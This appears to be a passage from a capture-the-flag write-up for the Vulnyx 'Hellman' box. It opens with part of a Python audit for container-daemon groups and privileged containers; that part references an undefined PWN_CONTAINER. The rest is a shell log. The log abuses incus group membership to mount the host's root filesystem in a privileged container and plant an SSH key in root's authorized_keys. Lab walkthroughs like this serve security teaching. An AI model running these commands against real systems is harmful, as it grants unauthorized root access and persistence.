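SAFE_CONTAINER = {
    "name": "web",
    "config": {"security.privileged": "false"},
    "devices": {
        "root": {"type": "disk", "pool": "default", "path": "/"},
        "www": {"type": "disk", "source": "/srv/www", "path": "/var/www"},
    },
}

# Constructed sample: the write-up's /etc/group lines plus one unrelated group.
GROUP_FILE = """incus:x:106:water
incus-user:x:107:
incus-admin:x:108:
wheel:x:10:root
"""

# Groups whose membership means "can talk to a root-level container daemon".
DAEMON_GROUPS = {"incus", "incus-admin", "lxd", "docker"}
# Host paths that should never be mounted into a container wholesale.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/home", "/var/lib/incus")


def _under(path: str, prefix: str) -> bool:
    """True if path equals prefix or lies below it; '/' matches only itself."""
    if prefix == "/":
        return path == "/"
    return path == prefix or path.startswith(prefix + "/")


def container_findings(cfg: dict) -> list:
    """Flag a privileged container and any disk device backed by a sensitive host path."""
    findings = []
    name = cfg.get("name", "?")
    privileged = str(cfg.get("config", {}).get("security.privileged", "false")).lower()
    if privileged == "true":
        findings.append(f"{name}: security.privileged=true (container root is host root)")
    for dev_name, dev in cfg.get("devices", {}).items():
        if dev.get("type") != "disk" or dev.get("source") is None:
            continue  # pool-backed root disks carry no host path
        src = dev["source"].rstrip("/") or "/"
        if any(_under(src, p) for p in SENSITIVE_HOST_PATHS):
            findings.append(f"{name}: device {dev_name} mounts host path {dev['source']} at {dev.get('path')}")
    return findings


def daemon_group_members(group_text: str) -> dict:
    """Map each container-daemon group present in /etc/group text to its member list."""
    members = {}
    for line in group_text.splitlines():
        parts = line.split(":")
        if len(parts) != 4:
            continue
        name, _pw, _gid, users = parts
        if name in DAEMON_GROUPS:
            members[name] = [u for u in users.split(",") if u]
    return members


if __name__ == "__main__":
    for grp, users in daemon_group_members(GROUP_FILE).items():
        print(f"{grp}: {users or '(no members)'}")
    for cfg in (PWN_CONTAINER, SAFE_CONTAINER):
        print(cfg["name"], container_findings(cfg) or "clean")
```

On a real host the group check is the one that matters most: once an untrusted user is in a daemon group, the container definitions are theirs to write, so the audit of existing containers only tells you whether the step has already been taken.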

Hellman:~$ wget 192.168.56.104/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.104 (192.168.56.104:80)
saving to 'alpine-v3.13-x86_64-20210218_0139.tar.gz'
alpine-v3.13-x86_64- 100% |***********************************************************************************************************| 3183k 0:00:00 ETA
'alpine-v3.13-x86_64-20210218_0139.tar.gz' saved
Hellman:~$

Hellman:~$ incus image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
Image imported with fingerprint: cd73881adaac667ca3529972c7b380af240a9e3b09730f8c8e4e6a23e1a7892b
Hellman:~$ incus init myimage pwn -c security.privileged=true
Creating pwn
Hellman:~$ incus config device add pwn host-root disk source=/ path=/mnt/root recursive=true
Device host-root added to pwn
Hellman:~$ incus start pwn
Hellman:~$ incus exec pwn sh
~ # ls -al /mnt/root/root/
total 44
drwx------ 8 root root 4096 Jan 29 04:25 .
drwxr-xr-x 21 root root 4096 Jan 29 04:25 ..
lrwxrwxrwx 1 root root 9 Jun 3 2025 .ash_history -> /dev/null
drwx------ 3 root root 4096 Jan 29 04:25 .cache
drwxr-xr-x 4 root root 4096 Jan 23 07:54 .config
drwx------ 3 root root 4096 Dec 27 14:39 .docker
drwxr-xr-x 3 root root 4096 Jun 3 2025 .local
-rw-r--r-- 1 root root 55 Jun 3 2025 .profile
drwx------ 2 root root 4096 Dec 29 16:40 .ssh
drwxr-xr-x 3 root root 4096 Jan 22 14:55 .vim
-rw-r--r-- 1 root root 91 Jan 22 14:55 .vimrc
-rw-r--r-- 1 root root 632 Jan 28 05:48 root.txt
~ # cat //mnt/root/root/root.txt

Write the public key in.

/mnt/root/root # ls -al
total 44
drwx------ 8 root root 4096 Jan 29 04:25 .
drwxr-xr-x 21 root root 4096 Jan 29 04:25 ..
lrwxrwxrwx 1 root root 9 Jun 3 2025 .ash_history -> /dev/null
drwx------ 3 root root 4096 Jan 29 04:25 .cache
drwxr-xr-x 4 root root 4096 Jan 23 07:54 .config
drwx------ 3 root root 4096 Dec 27 14:39 .docker
drwxr-xr-x 3 root root 4096 Jun 3 2025 .local
-rw-r--r-- 1 root root 55 Jun 3 2025 .profile
drwx------ 2 root root 4096 Dec 29 16:40 .ssh
drwxr-xr-x 3 root root 4096 Jan 22 14:55 .vim
-rw-r--r-- 1 root root 91 Jan 22 14:55 .vimrc
-rw-r--r-- 1 root root 632 Jan 28 05:48 root.txt
/mnt/root/root # cd .ssh
/mnt/root/root/.ssh # ls
/mnt/root/root/.ssh # echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFaiQLgsnx4YvCaeyvrfA6z9J7jnQB43fm9B0Ep27DKB root@kaada" > authorized_keys
/mnt/root/root/.ssh #
┌──(root㉿kaada)-[/home/kali/Desktop/lxd-alpine-builder-master]
└─# ssh root@192.168.56.253
_
__ _____| | ___ ___ _ __ ___ ___
\ \ /\ / / _ \ |/ __/ _ \| '_ ` _ \ / _ \
\ V V / __/ | (_| (_) | | | | | | __/
\_/\_/ \___|_|\___\___/|_| |_| |_|\___|

Hellman:~# id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
Hellman:~#

Vulnyx-Hellman
http://example.com/2026/02/04/Vulnyx-Hellman/
Author: Skyarrow
Posted on: February 4, 2026